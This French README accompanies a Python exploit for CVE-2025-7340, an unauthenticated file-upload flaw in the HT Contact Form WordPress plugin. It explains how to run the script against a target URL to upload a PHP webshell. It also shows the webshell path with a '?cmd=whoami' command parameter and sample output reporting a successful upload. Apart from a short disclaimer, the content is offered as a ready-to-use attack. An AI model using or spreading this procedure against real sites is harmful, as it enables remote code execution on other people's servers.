
Widget de formulaire de contact HT pour Elementor Page Builder & Gutenberg Blocks & Constructeur de formulaires. <= 2.2.1 - Téléchargement de fichier arbitraire non authentifié
CVE: CVE-2025-7340
CVSS: 9.8 (Critique)
Le plugin HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison d'une validation de type de fichier absente dans la fonction temp_file_upload dans toutes les versions jusqu'à la 2.2.1 incluse.
Cela permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur, pouvant conduire à une Exécution de Code à Distance (RCE).
Ce dépôt inclut un script d'exploitation Python qui automatise la découverte du formulaire vulnérable et télécharge un webshell sur le site affecté.
Le script détecte intelligemment les paramètres requis (nonce, form_id, endpoint ajax) et télécharge un shell PHP dans le chemin vulnérable.
✅ Exemple d'URL de formulaire vulnérable :
http://target.com/contact/
✅ Le formulaire vulnérable doit se trouver sur la page que vous passez à l'option -u.
Avant d'exécuter le script, installez les modules Python requis :
pip install -r requirements.txt
Contenu de requirements.txt :
requests
colorama
usage: CVE-2025-7340.py [-h]
Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL e.g http(s)://target.com
| Option | Description |
|---|---|
-h, --help | Affiche ce message d'aide et quitte |
-u, --url URL | URL cible, ex. http(s)://target.com/contact |
Une fois l'exploitation terminée avec succès, vous pouvez accéder à votre shell téléchargé à l'emplacement indiqué.
Ajoutez ?cmd=<votre_commande> pour exécuter des commandes système.
✅ Exemple :
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...
[+] Exploit Successfully!
Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php
Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited
Cet outil est fourni uniquement à des fins éducatives et de recherche.
L'auteur n'est pas responsable des dommages ou de l'utilisation abusive de ce code.
Ayez toujours une autorisation explicite avant de tester un système.
Khaled Alenazi (Nxploited)
GitHub: Nxploited